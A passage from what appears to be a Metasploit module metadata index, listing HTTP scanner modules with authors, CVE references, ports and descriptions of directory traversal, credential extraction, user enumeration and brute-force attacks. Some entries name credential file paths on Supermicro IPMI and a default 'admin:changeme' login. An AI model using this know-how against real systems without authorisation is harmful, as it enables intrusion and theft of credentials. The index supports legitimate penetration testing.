"ref_name": "scanner/http/smt_ipmi_static_cert_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/smt_ipmi_url_redirect_traversal": {
"name": "Supermicro Onboard IPMI url_redirect.cgi Authenticated Directory Traversal",
"full_name": "auxiliary/scanner/http/smt_ipmi_url_redirect_traversal",
"rank": 300,
"disclosure_date": "2013-11-06",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a directory traversal vulnerability in the url_redirect.cgi application\n accessible through the web interface of Supermicro Onboard IPMI controllers. The vulnerability\n is present due to a lack of sanitization of the url_name parameter. This allows an attacker with\n a valid, but not necessarily administrator-level account, to access the contents of any file\n on the system. This includes the /nv/PSBlock file, which contains the cleartext credentials for\n all configured accounts. This module has been tested on a Supermicro Onboard IPMI (X9SCL/X9SCM)\n with firmware version SMT_X9_214. Other file names to try include /PSStore, /PMConfig.dat, and\n /wsman/simple_auth.passwd",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities",
"URL-https://github.com/zenfish/ipmi/blob/master/dump_SM.py"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/smt_ipmi_url_redirect_traversal",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/soap_xml": {
"name": "HTTP SOAP Verb/Noun Brute Force Scanner",
"full_name": "auxiliary/scanner/http/soap_xml",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module attempts to brute force SOAP/XML requests to uncover\n hidden methods.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/scanner/http/soap_xml.rb",
"is_install_path": true,
"ref_name": "scanner/http/soap_xml",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/sockso_traversal": {
"name": "Sockso Music Host Server 1.5 Directory Traversal",
"full_name": "auxiliary/scanner/http/sockso_traversal",
"rank": 300,
"disclosure_date": "2012-03-14",
"type": "auxiliary",
"author": [
"Luigi Auriemma",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal bug in Sockso on port\n 4444. This is done by using \"../\" in the path to retrieve a file on\n a vulnerable machine.",
"references": [
"URL-http://aluigi.altervista.org/adv/sockso_1-adv.txt"
],
"platform": "",
"arch": "",
"rport": 4444,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/sockso_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/sockso_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/splunk_web_login": {
"name": "Splunk Web Interface Login Utility",
"full_name": "auxiliary/scanner/http/splunk_web_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module simply attempts to login to a Splunk web interface. Please note the\n free version of Splunk actually does not require any authentication, in that case\n the module will abort trying. Also, some Splunk applications still have the\n default credential 'admin:changeme' written on the login page. If this default\n credential is found, the module will also store that information, and then move on\n to trying more passwords.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/splunk_web_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/splunk_web_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/springcloud_traversal": {
"name": "Spring Cloud Config Server Directory Traversal",
"full_name": "auxiliary/scanner/http/springcloud_traversal",
"rank": 300,
"disclosure_date": "2019-04-17",
"type": "auxiliary",
"author": [
"Vern",
"Dhiraj Mishra"
],
"description": "This module exploits an unauthenticated directory traversal vulnerability\n which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,\n versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6. Spring\n Cloud Config listens by default on port 8888.",
"references": [
"CVE-2019-3799",
"URL-https://pivotal.io/security/cve-2019-3799"
],
"platform": "",
"arch": "",
"rport": 8888,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-04-26 07:15:39 +0000",
"path": "/modules/auxiliary/scanner/http/springcloud_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/springcloud_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/squid_pivot_scanning": {
"name": "Squid Proxy Port Scanner",
"full_name": "auxiliary/scanner/http/squid_pivot_scanning",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"willis"
],
"description": "A misconfigured Squid proxy can allow an attacker to make requests on his behalf.\n This may give the attacker information about devices that he cannot reach but the\n Squid proxy can. For example, an attacker can make requests for internal IP addresses\n against a misconfigured open Squid proxy exposed to the Internet, therefore performing\n an internal port scan. The error messages returned by the proxy are used to determine\n if the port is open or not.\n\n Many Squid proxies use custom error codes so your mileage may vary. The open_proxy\n module can be used to test for open proxies, though a Squid proxy does not have to be\n open in order to allow for pivoting (e.g. an Intranet Squid proxy which allows\n the attacker to pivot to another part of the network).",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/squid_pivot_scanning.rb",
"is_install_path": true,
"ref_name": "scanner/http/squid_pivot_scanning",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/squiz_matrix_user_enum": {
"name": "Squiz Matrix User Enumeration Scanner",
"full_name": "auxiliary/scanner/http/squiz_matrix_user_enum",
"rank": 300,
"disclosure_date": "2011-11-08",
"type": "auxiliary",
"author": [
"Troy Rose <troy@osisecurity.com.au>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module attempts to enumerate remote users that exist within\n the Squiz Matrix and MySource Matrix CMS by sending GET requests for asset IDs\n e.g. ?a=14 and searching for a valid username e.g. \"~root\" or \"~test\" which\n is prefixed by a \"~\" in the response. It will also try to GET the user's\n full name or description, or other information. You may wish to modify\n ASSETBEGIN and ASSETEND values for greater results, or set VERBOSE.\n Information gathered may be used for later bruteforce attacks.",
"references": [
"URL-http://www.osisecurity.com.au/advisories/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/squiz_matrix_user_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/ssl": {
"name": "HTTP SSL Certificate Information",
"full_name": "auxiliary/scanner/http/ssl",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>",
"Chris John Riley",
"Veit Hailperin <hailperv@gmail.com>"
],
"description": "Parse the server SSL certificate to obtain the common name and signature algorithm",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/ssl.rb",
"is_install_path": true,
"ref_name": "scanner/http/ssl",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/ssl_version": {
"name": "HTTP SSL/TLS Version Detection (POODLE scanner)",
"full_name": "auxiliary/scanner/http/ssl_version",
"rank": 300,
"disclosure_date": "2014-10-14",
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "Check if an HTTP server supports a given version of SSL/TLS.\n\n If a web server can successfully establish an SSLv3 session, it is\n likely to be vulnerable to the POODLE attack described on\n October 14, 2014, as a patch against the attack is unlikely.",
"references": [
"URL-http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html",
"OSVDB-113251",
"CVE-2014-3566"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/ssl_version.rb",
"is_install_path": true,
"ref_name": "scanner/http/ssl_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/support_center_plus_directory_traversal": {
"name": "ManageEngine Support Center Plus Directory Traversal",
"full_name": "auxiliary/scanner/http/support_center_plus_directory_traversal",
"rank": 300,
"disclosure_date": "2014-01-28",
"type": "auxiliary",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a directory traversal vulnerability found in ManageEngine\n Support Center Plus build 7916 and lower. The module will create a support ticket\n as a normal user, attaching a link to a file on the server. By requesting our\n own attachment, it's possible to retrieve any file on the filesystem with the same\n privileges as Support Center Plus is running. On Windows this is always with SYSTEM\n privileges.",
"references": [
"CVE-2014-100002",
"EDB-31262",
"OSVDB-102656",
"BID-65199",
"PACKETSTORM-124975"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-08 19:00:11 +0000",
"path": "/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/support_center_plus_directory_traversal",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/surgenews_user_creds": {
"name": "SurgeNews User Credentials",
"full_name": "auxiliary/scanner/http/surgenews_user_creds",
"rank": 300,
"disclosure_date": "2017-06-16",
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in the WebNews web interface\n of SurgeNews on TCP ports 9080 and 8119 which allows unauthenticated\n users to download arbitrary files from the software root directory;\n including the user database, configuration files and log files.\n\n This module extracts the administrator username and password, and\n the usernames and passwords or password hashes for all users.\n\n This module has been tested successfully on SurgeNews version\n 2.0a-13 on Windows 7 SP 1 and 2.0a-12 on Ubuntu Linux.",
"references": [
"URL-http://news.netwinsite.com:8119/webnews?cmd=body&item=34896&group=netwin.surgemail"
],
"platform": "",
"arch": "",
"rport": 9080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/surgenews_user_creds.rb",
"is_install_path": true,
"ref_name": "scanner/http/surgenews_user_creds",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/svn_scanner": {
"name": "HTTP Subversion Scanner",
"full_name": "auxiliary/scanner/http/svn_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "Detect Subversion directories and files and analyze their content. Only SVN version > 7 is supported",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/svn_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/svn_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/svn_wcdb_scanner": {
"name": "SVN wc.db Scanner",
"full_name": "auxiliary/scanner/http/svn_wcdb_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Stephen Haywood <stephen@averagesecurityguy.info>"
],
"description": "Scan for servers that allow access to the SVN wc.db file.\n Based on the work by Tim Meddin.",
"references": [
"URL-http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us#"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/svn_wcdb_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/sybase_easerver_traversal": {
"name": "Sybase Easerver 6.3 Directory Traversal",
"full_name": "auxiliary/scanner/http/sybase_easerver_traversal",
"rank": 300,
"disclosure_date": "2011-05-25",
"type": "auxiliary",
"author": [
"Sow Ching Shiong",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability found in Sybase\n EAserver's Jetty webserver on port 8000. Code execution seems unlikely with\n EAserver's default configuration unless the web server allows WRITE permission.",
"references": [
"CVE-2011-2474",
"OSVDB-72498",
"URL-http://www.sybase.com/detail?id=1093216",
"URL-https://labs.idefense.com/verisign/intelligence/2009/vulnerabilities/display.php?id=912"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/sybase_easerver_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/symantec_brightmail_ldapcreds": {
"name": "Symantec Messaging Gateway 10 Exposure of Stored AD Password Vulnerability",
"full_name": "auxiliary/scanner/http/symantec_brightmail_ldapcreds",
"rank": 300,
"disclosure_date": "2015-12-17",
"type": "auxiliary",
"author": [
"Fakhir Karim Reda <karim.fakhir@gmail.com>"
],
"description": "This module will grab the AD account saved in Symantec Messaging Gateway and then\n decipher it using the disclosed Symantec PBE key. Note that authentication is required\n in order to successfully grab the LDAP credentials, and you need at least a read account.\n Versions 10.6.0-7 and earlier are affected.",
"references": [
"URL-https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00",
"CVE-2016-2203",
"BID-86137"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb",
"is_install_path": true,
"ref_name": "scanner/http/symantec_brightmail_ldapcreds",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/symantec_brightmail_logfile": {
"name": "Symantec Messaging Gateway 9.5 Log File Download Vulnerability",
"full_name": "auxiliary/scanner/http/symantec_brightmail_logfile",
"rank": 300,
"disclosure_date": "2012-11-30",
"type": "auxiliary",
"author": [
"Ben Williams <ben.williams@ngssecure.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will download a file of your choice against Symantec Messaging\n Gateway. This is possible by exploiting a directory traversal vulnerability\n when handling the 'logFile' parameter, which will load an arbitrary file as\n an attachment. Note that authentication is required in order to successfully\n download your file.",
"references": [
"CVE-2012-4347",
"EDB-23110",
"OSVDB-88165",
"BID-56789",
"URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00"
],
"platform": "",
"arch": "",
"rport": 41080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb",
"is_install_path": true,
"ref_name": "scanner/http/symantec_brightmail_logfile",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/symantec_web_gateway_login": {
"name": "Symantec Web Gateway Login Utility",
"full_name": "auxiliary/scanner/http/symantec_web_gateway_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will attempt to authenticate to a Symantec Web Gateway.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/symantec_web_gateway_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/titan_ftp_admin_pwd": {
"name": "Titan FTP Administrative Password Disclosure",
"full_name": "auxiliary/scanner/http/titan_ftp_admin_pwd",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Spencer McIntyre"
],
"description": "On Titan FTP servers prior to version 9.14.1628, an attacker can\n retrieve the username and password for the administrative XML-RPC\n interface, which listens on TCP Port 31001 by default, by sending an\n XML request containing bogus authentication information. After sending\n this request, the server responds with the legitimate username and\n password for the service. With this information, an attacker has\n complete control over the FTP service, which includes the ability to\n add and remove FTP users, as well as add, remove, and modify\n available directories and their permissions.",
"references": [
"CVE-2013-1625"
],
"platform": "",
"arch": "",
"rport": 31001,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb",
"is_install_path": true,
"ref_name": "scanner/http/titan_ftp_admin_pwd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/title": {
"name": "HTTP HTML Title Tag Content Grabber",
"full_name": "auxiliary/scanner/http/title",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "Generates a GET request to the provided webservers and returns the server header,\n HTML title attribute and location header (if set). This is useful for rapidly identifying\n interesting web applications en masse.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-02-16 14:42:12 +0000",
"path": "/modules/auxiliary/scanner/http/title.rb",
"is_install_path": true,
"ref_name": "scanner/http/title",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/tomcat_enum": {
"name": "Apache Tomcat User Enumeration",
"full_name": "auxiliary/scanner/http/tomcat_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Heyder Andrade <heyder.andrade@gmail.com>",
"Leandro Oliveira <leandrofernando@gmail.com>"
],
"description": "This module enumerates Apache Tomcat's usernames via malformed requests to\n j_security_check, which can be found in the web administration package. It should\n work against Tomcat servers 4.1.0 - 4.1.39, 5.5.0 - 5.5.27, and 6.0.0 - 6.0.18.\n Newer versions no longer have the \"admin\" package by default. The 'admin' package\n is no longer provided for Tomcat 6 and later versions.",
"references": [
"BID-35196",
"CVE-2009-0580",
"OSVDB-55055"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/tomcat_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/tomcat_enum",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/tomcat_mgr_login": {
"name": "Tomcat Application Manager Login Utility",
"full_name": "auxiliary/scanner/http/tomcat_mgr_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>",
"Matteo Cantoni <goony@nothink.org>",
"jduck <jduck@metasploit.com>"
],
"description": "This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass.",
"references": [
"CVE-2009-3843",
"OSVDB-60317",
"BID-37086",
"CVE-2009-4189",
"OSVDB-60670",
"URL-http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html",
"ZDI-09-085",
"CVE-2009-4188",
"BID-38084",
"CVE-2010-0557",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21419179",
"CVE-2010-4094",
"ZDI-10-214",
"CVE-2009-3548",
"OSVDB-60176",
"BID-36954",
"URL-http://tomcat.apache.org/",
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
8081,
8444,
9080,
19300
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-02-13 14:31:56 +0000",
"path": "/modules/auxiliary/scanner/http/tomcat_mgr_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/tomcat_mgr_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/totaljs_traversal": {
"name": "Total.js prior to 3.2.4 Directory Traversal",
"full_name": "auxiliary/scanner/http/totaljs_traversal",
"rank": 300,
"disclosure_date": "2019-02-18",
"type": "auxiliary",
"author": [
"Riccardo Krauter",
"Fabio Cogno"
],
"description": "This module checks for and exploits a directory traversal vulnerability in Total.js prior to 3.2.4.\n\n Here is a list of accepted extensions: flac, jpg, jpeg, png, gif, ico, js, css, txt, xml,\n woff, woff2, otf, ttf, eot, svg, zip, rar, pdf, docx, xlsx, doc, xls, html, htm, appcache,\n manifest, map, ogv, ogg, mp4, mp3, webp, webm, swf, package, json, md, m4v, jsx, heif, heic",
"references": [
"CVE-2019-8903",
"CWE-22",
"URL-https://blog.totaljs.com/blogs/news/20190213-a-critical-security-fix/",
"URL-https://snyk.io/vuln/SNYK-JS-TOTALJS-173710"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-11 22:23:11 +0000",
"path": "/modules/auxiliary/scanner/http/totaljs_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/totaljs_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/tplink_traversal_noauth": {
"name": "TP-Link Wireless Lite N Access Point Directory Traversal Vulnerability",
"full_name": "auxiliary/scanner/http/tplink_traversal_noauth",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module tests whether a directory traversal vulnerability is present in\n versions of TP-Link Access Point 3.12.16 Build 120228 Rel.37317n.",
"references": [
"CVE-2012-5687",
"OSVDB-86881",
"BID-57969",
"EDB-24504",
"URL-http://www.s3cur1ty.de/m1adv2013-011"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb",
"is_install_path": true,
"ref_name": "scanner/http/tplink_traversal_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/trace": {
"name": "HTTP Cross-Site Tracing Detection",
"full_name": "auxiliary/scanner/http/trace",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jay Turla <@shipcod3>",
"CG <cg@carnal0wnage.com>"
],
"description": "Checks if the host is vulnerable to Cross-Site Tracing (XST)",
"references": [
"CVE-2005-3398",
"URL-https://www.owasp.org/index.php/Cross_Site_Tracing"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/trace.rb",
"is_install_path": true,
"ref_name": "scanner/http/trace",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/trace_axd": {
"name": "HTTP trace.axd Content Scanner",
"full_name": "auxiliary/scanner/http/trace_axd",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"c4an"
],
"description": "Detect trace.axd files and analyze their content",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/trace_axd.rb",
"is_install_path": true,
"ref_name": "scanner/http/trace_axd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/typo3_bruteforce": {
"name": "Typo3 Login Bruteforcer",
"full_name": "auxiliary/scanner/http/typo3_bruteforce",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module attempts to bruteforce Typo3 logins.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/typo3_bruteforce.rb",
"is_install_path": true,
"ref_name": "scanner/http/typo3_bruteforce",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/vcms_login": {
"name": "V-CMS Login Utility",
"full_name": "auxiliary/scanner/http/vcms_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module attempts to authenticate to an English-based V-CMS login interface. It\n should only work against version v1.1 or older, because these versions do not have\n any default protections against brute forcing.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/vcms_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/vcms_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/verb_auth_bypass": {
"name": "HTTP Verb Authentication Bypass Scanner",
"full_name": "auxiliary/scanner/http/verb_auth_bypass",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module tests for authentication bypass using different HTTP verbs.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/verb_auth_bypass.rb",
"is_install_path": true,
"ref_name": "scanner/http/verb_auth_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/vhost_scanner": {
"name": "HTTP Virtual Host Brute Force Scanner",
"full_name": "auxiliary/scanner/http/vhost_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module tries to identify unique virtual hosts\n hosted by the target web server.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/vhost_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/vhost_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wangkongbao_traversal": {
"name": "WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal",
"full_name": "auxiliary/scanner/http/wangkongbao_traversal",
"rank": 300,
